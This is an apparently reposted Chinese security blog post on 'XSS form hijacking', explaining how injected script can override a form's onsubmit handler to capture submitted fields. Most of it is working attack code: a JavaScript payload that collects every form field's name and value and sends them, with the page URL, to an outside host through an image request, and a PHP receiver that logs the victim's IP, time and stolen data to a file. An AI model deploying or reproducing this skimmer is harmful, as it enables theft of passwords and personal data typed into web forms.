xss 表單劫持(from通用明文記錄)

發(fā)布時間：2020-07-24 12:39:25 來源：網(wǎng)絡(luò) 閱讀：3655 作者：jzking121 欄目：網(wǎng)絡(luò)安全

大家都知道,在提交form表單時會調(diào)用onsubmit方法,既然調(diào)用了onsubmit,說明表單中該填的項(xiàng)肯定都已經(jīng)填好了,這時,我們通過修改onsubmit方法,便可以獲取表單中的信息.

xss.js:

var f=document.forms['from1'];
if(f==undefined)
{
        f=document.getElementById('');
}
var func=f.onsubmit;
f.onsubmit=function(event)
{
	var str='';
	for(var i=0;i<f.elements.length;i++)
	{
		str+=f.elements[i].name+':'+f.elements[i].value+'||';
	}
	str=str.substr(0,str.length-2);
	var img=new Image();
	img.src='https://blog.51cto.com/xss.php?data='+escape(str)+'&url='+escape(location.href);
	func(event);
	return true;
}

根據(jù)各程序不同，修改表單名稱

var f=document.forms['form1'];

接收端xss.php

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_GET['data'];
$url = $_GET['url'];
$time = gmdate("H:i:s",time()+8*3600);
$file = "jzking121.txt" ;
$fp=fopen ("jzking121.txt","a")  ;
$txt= "$ip"."----"."$time"."----"."$cookie"."----"."$url"."\n";
fputs($fp,$txt);
?>

參考：

http://dwblog.github.io/2015/04/29/%E8%A1%A8%E5%8D%95%E5%8A%AB%E6%8C%81/

向AI問一下細(xì)節(jié)

xss 表單劫持(from通用明文記錄)

猜你喜歡

最新資訊

相關(guān)推薦

相關(guān)標(biāo)簽